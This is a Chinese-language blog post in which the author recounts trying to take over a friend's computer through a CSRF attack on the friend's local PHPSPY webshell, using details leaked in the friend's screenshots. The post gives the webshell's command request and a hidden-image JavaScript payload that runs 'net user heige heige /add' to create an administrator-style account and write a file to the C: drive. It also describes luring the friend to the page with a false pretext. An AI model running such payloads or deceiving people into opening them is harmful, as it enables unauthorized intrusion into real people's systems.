Just a fun
版权声明:转载时请以超链接形式标明文章原始出处和作者信息及本声明
http://superhei.blogbus.com/logs/12289653.html
Just a fun
前几天看angel的blog得知道他正在写PHPSPY2008:http://www.sablog.net/blog/phpspy-2008/ ,并且给了很多测试截图片,like:
http://www.sablog.net/blog/attachment.php?id=543
在这些图片里,angel暴露了他的很多信息,比如本地的web server的连接和相对路径:
http://localhost/phpspy/2008.php
绝对路径:F:/www/phpspy/
同一个目录下还有PHPSPY2007和PHPSPY2006等版本
还有他的本地mysql的一些结构:包括库名,主要还有一些前缀,我记得还有一张还有一些用户的md5的hash [现在好象删除了:)],还有angel用的是Maxthon 2.06
这些信息直接给出来是很危险的,于是我决定测试下看我可以不可以根据这些信息可不可以own angel's box. [just a fun]:
思路1:尝试那些md5 hash
思路2:直接使用csrf 通过http://localhost/phpspy/2008.php 直接执行命令
思路1正在尝试起来很麻烦,而且也不是真正想黑,思路2行动起来比较容易,很直观.而且我还可以弥补在文
《xss/csrf in penetration test》[1]没有用csrf攻击的遗憾。首先先了解2008.php执行命令变量提交,当时我还没有2008.php,不知道angel有没有改,不过看他的目录下还有2006和2007。但是就在这个时候angel联系我要我们群里的朋友测试2008.php,哈哈时候到了….
于是我看了一下2008.php执行命令提交的格式:
POST /2008.php?action=shell HTTP/1.1
……………
execfunc=system&command=net+user&submit=%C8%B7%B6%A8
我们换get提交看可以不,提交:2008.php?action=shell&execfunc=system&command=net user 一样可以,看来是用的Request变量[2]
ok,angel用的是Maxthon 2.06是ie内核心,应该没有ff上的noscript那样的安全插件,我们可以用js:
<script>
var url = 'http://localhost/phpspy/2008.php?action=shell&execfunc=system&command=net user heige heige /add|echo fuck >c:\\heige.txt';
getURL(url);
function getURL(s) {
var image = new Image();
image.style.width = 0;
image.style.height = 0;
image.src = s;
}
</script>
然后把他放到我的一个空间的2008.php的里面,然后就等发给angel去测试了,不过等我搞完angel已经不在线,只好等第2天了,第2天下班angel在线,于是我在群里说2008.php在我的空间显示不怎么理想,angel果然link进去了…..
结果:我没有成功,angel说他根本没有登陆他的http://localhost/phpspy/2008.php ,居然测试代码不登陆!!!,不过应该有cookie保存的啊,不过angel说他计算机问题cookie保存不了!!!!! 天意~~~, 一切都是天意! :)
最后:xss/csrf真的很险恶,防不甚防。说不顶我在写这个文章的时候,有个人正在2个眼睛看这个我打字呢…..
[1]:http://superhei.blogbus.com/logs/11257167.html
[2]:http://superhei.blogbus.com/logs/11412189.html
